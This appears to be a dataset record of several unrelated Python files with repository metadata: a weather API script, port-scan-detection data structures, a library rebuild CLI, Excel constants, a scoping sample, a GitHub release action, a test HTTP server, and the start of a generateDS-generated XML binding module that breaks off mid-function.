# --- OpenWeatherMap current-weather request -------------------------------
api_keyW = "Enter Your Own API From"
base_urlW = "http://api.openweathermap.org/data/2.5/weather?units=metric&cnt=7&lang=en&"
city_name = input("Enter City Name: ")
complete_urlw = base_urlW + "appid=" + api_keyW + "&q=" + city_name

responsew = requests.get(complete_urlw)
y = responsew.json()

# Extract the main weather readings.
z = y['main']
cur_temp = z["temp"]
cur_pres = z["pressure"]
cur_humi = z["humidity"]
min_temp = z["temp_min"]
max_temp = z["temp_max"]
# Fix: the original assigned the literal list ["visibility"] instead of
# looking the value up.  OpenWeatherMap reports 'visibility' at the top
# level of the response, so read it from there (None when absent).
visibili = y.get("visibility")
w = y["wind"]
wind_speed = w["speed"]
wind_deg = w["deg"]

# The city's coordinates feed the sunrise-sunset.org lookup below.
longi = y['coord']['lon']
latti = y['coord']['lat']

# --- sunrise-sunset.org request -------------------------------------------
# The base URL takes no parameters itself; lat/lng are appended as a query
# string, e.g. https://api.sunrise-sunset.org/json?lat=36.72016&lng=-4.42034
base_url = "https://api.sunrise-sunset.org/json"
latitude = str(latti)
longitude = str(longi)
complete_url = base_url + '?lat=' + latitude + '&lng=' + longitude

response = requests.get(complete_url)
x = response.json()
sunset = x['results']['sunset']
sunrise = x['results']['sunrise']

print(" Current Temprature(In Celsius unit) = " + str(cur_temp) +
      "\n Atmospheric Pressure (in hPa unit) = " + str(cur_pres) +
      "\n Humidity (in percentage) = " + str(cur_humi) +
      "\n Minimum Temprature = " + str(min_temp) +
      "\n Maximum Temprature = " + str(max_temp) +
      "\n Wind Speed =" + str(wind_speed) +
      "\n Degree = " + str(wind_deg) +
      "\n Sunrise (in UTC) = " + str(sunrise) +
      "\n Sunset (in UTC) = " + str(sunset))
| 17.154545 | 88 | 0.63487 |
40fc7f28594c34e6d6432a51c5b9165268bd7b37 | 2,557 | py | Python | entry.py | pythonhacker/pyscanlogd | 64d6ad38127243e5c422be7f899ecfa802e1ad21 | [
"BSD-3-Clause"
] | 1 | 2021-04-03T22:15:06.000Z | 2021-04-03T22:15:06.000Z | entry.py | pythonhacker/pyscanlogd | 64d6ad38127243e5c422be7f899ecfa802e1ad21 | [
"BSD-3-Clause"
] | null | null | null | entry.py | pythonhacker/pyscanlogd | 64d6ad38127243e5c422be7f899ecfa802e1ad21 | [
"BSD-3-Clause"
] | 2 | 2020-12-18T20:06:21.000Z | 2021-04-08T02:47:40.000Z | # -- coding: utf-8
class ScanEntry(object):
    """State tracked for one potential port-scan source/target pair."""

    def __init__(self, hash):
        # Endpoint addresses (zombie presumably used for idle-scan
        # tracking -- confirm against the scan-detection logic).
        self.src = 0
        self.dst = 0
        self.zombie = 0
        # Timing statistics over the observed packets.
        self.timestamp = 0
        self.timediffs = []
        self.time_avg = 0.0   # mean of the recorded time differences
        self.time_sd = 0.0    # standard deviation of the time differences
        # Classification / bookkeeping fields.
        self.logged = False
        self.type = ''
        self.flags_or = 0
        self.chunk_type = 0   # SCTP chunk type
        self.weight = 0
        self.ports = []
        self.proto = 0
        # Intrusive linked-list pointer plus this entry's own hash key.
        self.next = None
        self.hash = hash

    def update_time_sd(self):
        """Recompute the mean and population standard deviation of
        ``timediffs``; both are left untouched when there are no samples."""
        samples = self.timediffs
        count = len(samples)
        if not count:
            return
        mean = sum(samples) / float(count)
        variance = sum((delta - mean) ** 2 for delta in samples) / float(count)
        self.time_avg = mean
        self.time_sd = variance ** 0.5
class EntryLog(dict):
    """A dict with fixed capacity that evicts its oldest entry when full.

    Values must carry their own key in a ``hash`` attribute and a ``next``
    attribute linking to the value inserted after them; the class threads
    that singly linked list from ``oldest`` to ``last`` so eviction is O(1).
    (Re-assigning an existing key re-links the list as if the value were
    brand new.)
    """

    def __init__(self, maxsz):
        super(EntryLog, self).__init__()
        self.maxsz = maxsz
        # Head and tail of the insertion-order linked list.
        self.oldest = None
        self.last = None

    def __setitem__(self, key, value):
        is_new_key = key not in self
        if is_new_key and len(self) == self.maxsz:
            # At capacity: drop the oldest entry and advance the list head.
            if self.oldest:
                self.__delitem__(self.oldest.hash)
                self.oldest = self.oldest.next
        super(EntryLog, self).__setitem__(key, value)
        if self.last:
            # Append the new value at the tail of the insertion list.
            self.last.next = value
            self.last = value
        else:
            # First insertion: the value is both the oldest and the newest.
            self.last = value
            self.oldest = self.last
class RecentScanEntry(object):
    """Immutable-ish snapshot of a scan kept in the recent-scans history."""

    def __init__(self, scan, is_scan=True):
        # Copy the identifying fields off the live ScanEntry.
        self.src = scan.src
        self.dst = scan.dst
        self.zombie = scan.zombie
        self.type = scan.type
        self.flags_or = scan.flags_or
        # Snapshot the port list so later mutations don't leak in.
        self.ports = list(scan.ports)
        self.timestamp = scan.timestamp
        self.is_scan = is_scan

    def __eq__(self, entry):
        """Entries match when source, destination and scan type agree."""
        return (self.src == entry.src
                and self.dst == entry.dst
                and self.type == entry.type)
| 29.732558 | 81 | 0.541259 |
53b3b931c2ef5c69e9c3b0d698c46d504330cf25 | 1,411 | py | Python | ElexonDataPortal/rebuild.py | r4ch45/ElexonDataPortal | d44ed4da33278c0135ff95fb126a10d9384af22f | [
"MIT"
] | 22 | 2021-01-12T12:34:43.000Z | 2022-03-30T06:18:40.000Z | ElexonDataPortal/rebuild.py | r4ch45/ElexonDataPortal | d44ed4da33278c0135ff95fb126a10d9384af22f | [
"MIT"
] | 12 | 2021-02-26T16:17:58.000Z | 2022-03-29T19:32:29.000Z | ElexonDataPortal/rebuild.py | r4ch45/ElexonDataPortal | d44ed4da33278c0135ff95fb126a10d9384af22f | [
"MIT"
] | 6 | 2021-06-07T11:58:35.000Z | 2022-03-30T06:18:42.000Z | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/07-cli-rebuild.ipynb (unless otherwise specified).
# Public API of this auto-generated CLI module.
__all__ = ['app', 'rebuild_library']
# Cell
import typer
import shutil
import pandas as pd
from fastcore.foundation import Config
from .dev import nbdev, specgen, rawgen, clientgen
# Cell
# Typer application that hosts the CLI command(s) registered below.
app = typer.Typer()
# Cell
@app.command()
def rebuild_library():
    """Regenerate the ElexonDataPortal package from notebooks and templates.

    Destructive: deletes the current library directory, re-exports the
    nbdev notebooks, rebuilds the OpenAPI spec from data/endpoints.csv,
    then regenerates the raw-method and API-client modules.
    """
    lib_path = str(Config().path('lib_path'))
    dir_root = f'{lib_path}/..'
    endpoints_fp = f'{dir_root}/data/endpoints.csv'
    # Wipe the generated package and rebuild it from the notebooks.
    shutil.rmtree(lib_path)
    nbdev.prepare_nbdev_module()
    nbdev.notebook2script()
    # Build and persist the OpenAPI spec from the endpoint definitions.
    df_endpoints = specgen.load_endpoints_df(endpoints_fp)
    API_spec = specgen.construct_spec(df_endpoints)
    specgen.save_spec(
        API_spec,
        in_fp=f'{dir_root}/templates/open_api_spec.yaml',
        out_fp=f'{dir_root}/data/BMRS_API.yaml'
    )
    # Generate the low-level request functions from the saved spec.
    rawgen.save_methods(
        functions=rawgen.construct_all_functions(specgen.load_API_yaml(fp=f'{dir_root}/data/BMRS_API.yaml')),
        in_fp=f'{dir_root}/templates/raw_methods.py',
        out_fp=f'{dir_root}/ElexonDataPortal/dev/raw.py'
    )
    # Generate the user-facing API client module.
    clientgen.save_api_client(
        API_yaml_fp=f'{dir_root}/data/BMRS_API.yaml',
        in_fp=f'{dir_root}/templates/api.py',
        out_fp=f'{dir_root}/ElexonDataPortal/api.py'
    )
    nbdev.add_extra_code_desc_to_mod()
    return
# Cell
if __name__ == '__main__' and '__file__' in globals():
app() | 26.12963 | 109 | 0.696669 |
4a4ae5f2fb5ae97276348505e4c71cb27e6c5f39 | 1,211 | py | Python | dist/vengeance-1.0.3.tar/dist/vengeance-1.0.3/vengeance/excel_com/excel_constants.py | michael-ross-ven/vengeance | 53c6eefba0573936d22a55ba5900744ac701f4b9 | [
"MIT"
] | 1 | 2020-01-18T18:23:26.000Z | 2020-01-18T18:23:26.000Z | dist/vengeance-1.0.3.tar/dist/vengeance-1.0.3/vengeance/excel_com/excel_constants.py | michael-ross-ven/vengeance | 53c6eefba0573936d22a55ba5900744ac701f4b9 | [
"MIT"
] | null | null | null | dist/vengeance-1.0.3.tar/dist/vengeance-1.0.3/vengeance/excel_com/excel_constants.py | michael-ross-ven/vengeance | 53c6eefba0573936d22a55ba5900744ac701f4b9 | [
"MIT"
] | null | null | null |
# excel-specific constants
# (explicitly encoded as ascii instead of utf to avoid issues w/ C++ safearray strings)
xl_class_name = 'XLMAIN'.encode('ascii')
xl_desk_class = 'XLDESK'.encode('ascii')
xl_excel7_class = 'EXCEL7'.encode('ascii')
# HKEY_CLASSES_ROOT\Excel.Application: excel's clsid
xl_clsid = '{00020400-0000-0000-C000-000000000046}'
excel_errors = {-2146826281: 'error div0',
-2146826246: 'error na',
-2146826259: 'error name',
-2146826288: 'error null',
-2146826252: 'error num',
-2146826265: 'error ref',
-2146826273: 'error value',
0x800A07FA: 'error div0'}
# colors
xl_yellow = 13434879
xl_clear = -4142
# find parameters
xl_values = -4163
xl_cell_type_formulas = -4123
xl_errors = 16
xl_whole = 1
xl_part = 2
xl_next = 1
xl_previous = 2
xl_by_rows = 1
xl_by_columns = 2
xl_up = -4162
xl_to_right = -4161
# enums
xl_paste_column_widths = 8
xl_range_ms_xml = 12
xl_range_value_ms_persist_xml = 12
# external / windows / shell constants
xl_maximized = -4137
sw_show = 1
native_om = -16
vb_ok_only = 0
process_terminate = 1
| 24.714286 | 87 | 0.64327 |
17324f2d45e4f3fca2f949bcb117ee2780cb3cfc | 208 | py | Python | example/sample6.py | sano-jin/go-in-ocaml | b5e5fca33e194776477a0db389f6e52bdc0a66fe | [
"MIT"
] | 1 | 2021-09-24T10:25:40.000Z | 2021-09-24T10:25:40.000Z | example/sample6.py | sano-jin/go-in-ocaml | b5e5fca33e194776477a0db389f6e52bdc0a66fe | [
"MIT"
] | null | null | null | example/sample6.py | sano-jin/go-in-ocaml | b5e5fca33e194776477a0db389f6e52bdc0a66fe | [
"MIT"
] | null | null | null | y = 0
def hoge (y):
def hige ():
print(y)
y = 1
def fuga ():
nonlocal y
y = y + 2
print(y)
return hige
return fuga
h = hoge(3)
h()
h()()
h()()
print(y)
| 12.235294 | 19 | 0.408654 |
6206d9993053bd1057addb1ced2a2a2ed9efcf40 | 2,235 | py | Python | actions/latest_release.py | kingsleyadam/stackstorm-github | 611c318cd294a58a7e8b1f20161c5404e41efaf0 | [
"Apache-2.0"
] | 164 | 2015-01-17T16:08:33.000Z | 2021-08-03T02:34:07.000Z | actions/latest_release.py | kingsleyadam/stackstorm-github | 611c318cd294a58a7e8b1f20161c5404e41efaf0 | [
"Apache-2.0"
] | 442 | 2015-01-01T11:19:01.000Z | 2017-09-06T23:26:17.000Z | actions/latest_release.py | kingsleyadam/stackstorm-github | 611c318cd294a58a7e8b1f20161c5404e41efaf0 | [
"Apache-2.0"
] | 202 | 2015-01-13T00:37:40.000Z | 2020-11-07T11:30:10.000Z | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
import time
import datetime
from lib.base import BaseGithubAction
class LatestReleaseAction(BaseGithubAction):
    """Fetch metadata about the latest published release of a repository.

    Issues ``GET /repos/{repository}/releases/latest`` against the public
    or enterprise GitHub API and flattens the interesting response fields
    into a plain dict.
    """

    def run(self, api_user, repository, github_type):
        """Return a dict describing *repository*'s latest release.

        :param api_user: optional user whose stored token should be used.
        :param repository: "owner/name" repository slug.
        :param github_type: selects public GitHub vs GitHub Enterprise.
        """
        enterprise = self._is_enterprise(github_type)

        if api_user:
            self.token = self._get_user_token(api_user, enterprise)

        release = self._request("GET",
                                "/repos/{}/releases/latest".format(repository),
                                None,
                                token=self.token,
                                enterprise=enterprise)

        # 'published_at' is an ISO-8601 UTC timestamp (trailing "Z").
        # Use calendar.timegm(), which interprets the struct_time as UTC;
        # the previous time.mktime() call treated it as *local* time and
        # skewed the epoch value by the machine's UTC offset.
        import calendar
        published_struct = datetime.datetime.strptime(
            release['published_at'],
            "%Y-%m-%dT%H:%M:%SZ").timetuple()
        ts_published_at = float(calendar.timegm(published_struct))

        results = {'author': release['author']['login'],
                   'avatar_url': release['author']['avatar_url'],
                   'html_url': release['html_url'],
                   'tag_name': release['tag_name'],
                   'target_commitish': release['target_commitish'],
                   'name': release['name'],
                   'body': release['body'],
                   'draft': release['draft'],
                   'prerelease': release['prerelease'],
                   'created_at': release['created_at'],
                   'published_at': release['published_at'],
                   'ts_published_at': ts_published_at,
                   'total_assets': len(release['assets'])}
        return results
| 40.636364 | 79 | 0.599553 |
74e84f0d80fc8aa1aa0dba8d39bc3a0a187c3289 | 1,784 | py | Python | tests/simple_server.py | omerlh/tuf | f496c83e78b05c2f50a0bd5dde197782a839177b | [
"Apache-2.0",
"MIT"
] | 1,324 | 2015-01-08T23:18:59.000Z | 2021-09-02T07:51:27.000Z | tests/simple_server.py | omerlh/tuf | f496c83e78b05c2f50a0bd5dde197782a839177b | [
"Apache-2.0",
"MIT"
] | 988 | 2015-01-02T14:21:06.000Z | 2021-09-02T08:55:29.000Z | tests/simple_server.py | menendezjaume/tuf | 41f7e809fef4cfe578cd2bd96f497da74b1bce15 | [
"Apache-2.0",
"MIT"
] | 221 | 2015-01-02T13:30:29.000Z | 2021-08-29T14:26:17.000Z | #!/usr/bin/env python
# Copyright 2012 - 2017, New York University and the TUF contributors
# SPDX-License-Identifier: MIT OR Apache-2.0
"""
<Program>
simple_server.py
<Author>
Konstantin Andrianov.
<Started>
February 15, 2012.
<Copyright>
See LICENSE-MIT or LICENSE for licensing information.
<Purpose>
This is a basic server that was designed to be used in conjunction with
test_download.py to test download.py module.
<Reference>
SimpleHTTPServer:
http://docs.python.org/library/simplehttpserver.html#module-SimpleHTTPServer
"""
import sys
import random
import socketserver
from http.server import SimpleHTTPRequestHandler
class QuietHTTPRequestHandler(SimpleHTTPRequestHandler):
  """A SimpleHTTPRequestHandler that does not write incoming requests to
  stderr. """
  # Override the base-class hook that logs one line per request; a no-op
  # body suppresses the per-request stderr output entirely.
  def log_request(self, code='-', size='-'):
    pass
# NOTE: On Windows/Python2 tests that use this simple_server.py in a
# subprocesses hang after a certain amount of requests (~68), if a PIPE is
# passed as Popen's stderr argument. This problem doesn't emerge if
# we silence the HTTP messages.
# If you decide to receive the HTTP messages, then this bug
# could reappear.
use_quiet_http_request_handler = True
if len(sys.argv) > 2:
  # NOTE(review): the argv value is kept as a *string*, so any non-empty
  # argument (including "0" or "False") is truthy and still selects the
  # quiet handler -- confirm whether that is intended.
  use_quiet_http_request_handler = sys.argv[2]
if use_quiet_http_request_handler:
  handler = QuietHTTPRequestHandler
else:
  handler = SimpleHTTPRequestHandler
# Allow re-use so you can re-run tests as often as you want even if the
# tests re-use ports. Otherwise TCP TIME-WAIT prevents reuse for ~1 minute
socketserver.TCPServer.allow_reuse_address = True
# Port 0 asks the OS for an ephemeral port; the chosen port is printed
# below so the parent test process can read it from stdout.
httpd = socketserver.TCPServer(('localhost', 0), handler)
port_message = 'bind succeeded, server port is: ' \
               + str(httpd.server_address[1])
print(port_message)
# Serve until the parent process terminates us.
httpd.serve_forever()
| 27.446154 | 80 | 0.767937 |
58cb32adcb2e2f51ff00fd7f0e8e579272f6325f | 566,397 | py | Python | pypwio/qes.py | zooks97/pypwio | 936542e214c2792d850c725f393c47f22aa98845 | [
"MIT"
] | null | null | null | pypwio/qes.py | zooks97/pypwio | 936542e214c2792d850c725f393c47f22aa98845 | [
"MIT"
] | null | null | null | pypwio/qes.py | zooks97/pypwio | 936542e214c2792d850c725f393c47f22aa98845 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Tue Aug 28 11:14:42 2018 by generateDS.py version 2.29.24.
# Python 3.6.6 |Anaconda, Inc.| (default, Jun 28 2018, 17:14:51) [GCC 7.2.0]
#
# Command line options:
# ('-f', '')
# ('-o', 'qes-1.0.py')
#
# Command line arguments:
# qes-1.0.xsd
#
# Command line:
# /home/azadoks/.local/miniconda3/envs/dftman/bin/generateDS -f -o "qes-1.0.py" qes-1.0.xsd
#
# Current working directory (os.getcwd()):
# xml
#
import sys
import re as re_
import base64
import datetime as datetime_
import warnings as warnings_
try:
from lxml import etree as etree_
except ImportError:
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
    """Parse the XML document in *infile* and return an ElementTree."""
    if parser is None:
        # Prefer lxml's ElementTree-compatible parser (it skips comments);
        # plain xml.etree has no ETCompatXMLParser, so fall back to the
        # standard parser in that case.
        try:
            make_parser = etree_.ETCompatXMLParser
        except AttributeError:
            make_parser = etree_.XMLParser
        parser = make_parser()
    return etree_.parse(infile, parser=parser, **kwargs)
def parsexmlstring_(instring, parser=None, **kwargs):
    """Parse the XML document in *instring* and return its root element."""
    active_parser = parser
    if active_parser is None:
        # lxml's comment-ignoring parser when available, stdlib otherwise.
        try:
            active_parser = etree_.ETCompatXMLParser()
        except AttributeError:
            active_parser = etree_.XMLParser()
    return etree_.fromstring(instring, parser=active_parser, **kwargs)
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for a example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ImportError:
GenerateDSNamespaceDefs_ = {}
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return values
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_validate_float(self, input_data, node=None, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return values
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node=None, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node=None, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (
time_parts[0], "{}".format(micro_seconds).rjust(6, "0"), )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(
hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node=None, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_validate_simple_patterns(self, patterns, target):
# pat is a list of lists of strings/patterns.
# The target value must match at least one of the patterns
# in order for the test to succeed.
found1 = True
for patterns1 in patterns:
found2 = False
for patterns2 in patterns1:
mo = re_.search(patterns2, target)
if mo is not None and len(mo.group(0)) == len(target):
found2 = True
break
if not found2:
found1 = False
break
return found1
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
@staticmethod
def gds_encode(instring):
if sys.version_info.major == 2:
if ExternalEncoding:
encoding = ExternalEncoding
else:
encoding = 'utf-8'
return instring.encode(encoding)
else:
return instring
@staticmethod
def convert_unicode(instring):
if isinstance(instring, str):
result = quote_xml(instring)
elif sys.version_info.major == 2 and isinstance(instring, unicode):
result = quote_xml(instring).encode('utf8')
else:
result = GeneratedsSuper.gds_encode(str(instring))
return result
def __eq__(self, other):
if type(self) != type(other):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
def getSubclassFromModule_(module, class_):
    """Return *module*'s '<ClassName>Sub' attribute, or None if absent.

    Subclass modules expose their overrides under the '<name>Sub' naming
    convention; this resolves that convention in one lookup.
    """
    return getattr(module, class_.__name__ + 'Sub', None)
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = ''
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
CDATA_pattern_ = re_.compile(r"<!\[CDATA\[.*?\]\]>", re_.DOTALL)
# Change this to redirect the generated superclass module to use a
# specific subclass module.
CurrentSubclassModule_ = None
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
    """Write *level* units of four-space indentation to *outfile*.

    A no-op when pretty_print is False (compact output mode).
    """
    if not pretty_print:
        return
    outfile.write('    ' * level)
def quote_xml(inStr):
    """Escape XML markup characters, leaving CDATA sections untouched."""
    if not inStr:
        return ''
    text = inStr if isinstance(inStr, BaseStrType_) else '%s' % inStr
    pieces = []
    cursor = 0
    # Escape only the stretches *between* CDATA sections; copy the CDATA
    # sections through verbatim so their content is not double-escaped.
    for match in CDATA_pattern_.finditer(text):
        pieces.append(quote_xml_aux(text[cursor:match.start()]))
        pieces.append(match.group(0))
        cursor = match.end()
    pieces.append(quote_xml_aux(text[cursor:]))
    return ''.join(pieces)
def quote_xml_aux(inStr):
    """Escape the three XML markup characters (&, <, >) in *inStr*."""
    # '&' must be escaped first so the entities just produced survive.
    escaped = inStr.replace('&', '&amp;')
    escaped = escaped.replace('<', '&lt;')
    return escaped.replace('>', '&gt;')
def quote_attrib(inStr):
    """Escape *inStr* and wrap it in quotes for use as an XML attribute."""
    text = inStr if isinstance(inStr, BaseStrType_) else '%s' % inStr
    text = text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
    if '"' not in text:
        return '"%s"' % text
    if "'" not in text:
        # Value contains double quotes only: single-quote delimiters work.
        return "'%s'" % text
    # Both quote styles present: entity-encode the double quotes.
    return '"%s"' % text.replace('"', "&quot;")
def quote_python(inStr):
    """Return *inStr* rendered as a Python string literal.

    Single-quoted (or triple-single-quoted for multiline) when the text
